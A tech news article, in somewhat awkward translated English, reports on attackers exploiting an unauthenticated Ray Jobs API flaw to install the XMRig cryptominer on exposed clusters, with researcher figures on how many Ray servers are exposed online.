- Ray clusters remain vulnerable to remote code execution via unauthenticated Jobs API
- “IronErn440” threat group exploits flaw with AI-generated payloads and deploys XMRig cryptojacker
- More than 230,000 Ray servers exposed online, up from just a few thousand in 2023
Experts have warned that Ray clusters, still vulnerable to a critical severity flaw discovered years ago, are being used for cryptocurrency mining, data exfiltration and even distributed denial of service (DDoS) attacks.
Cybersecurity researchers Oligo say this is the second major campaign to exploit this same flaw.
Ray is an open source network that helps run Python programs faster by decentralizing and distributing work across multiple machines. Its clusters are groups of computers (one master node and multiple worker nodes) that work together to execute Ray tasks and workloads in a distributed and coordinated manner.
Deploy and hide XMRig
In 2023, Ray 2.6.3 and 2.8.0 were discovered to have a vulnerability that allowed a remote attacker to execute arbitrary code via the Job Submission API. However, Anyscale, the company behind the product, didn’t fix it as it is designed to run in a “strictly controlled network environment.”
In other words, it is up to users to protect their infrastructure and ensure that the flaw is not abused.
But he was abused. First, between September 2023 and March 2024, and today. Oligo says threat actors tracked as “IronErn440” are now using AI-generated payloads to infiltrate vulnerable clusters. By exploiting the bug, attackers submit jobs to unauthenticated Jobs API, executing multi-stage Bash and Python payloads hosted on GitHub and GitLab.
These payloads deploy malware to devices, typically the infamous XMRig cryptojacker. While this cryptojacker is usually easily detected (since it consumes 100% of the device’s processing power and renders it useless for almost anything else), attackers attempted to fix this issue by blocking it at 60% of the processing power.
Today, there are more than 230,000 Ray servers exposed to the Internet, the researchers warned, saying their number has grown significantly compared to only “a few thousand” that were available when the vulnerability was first discovered.
Through beepcomputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
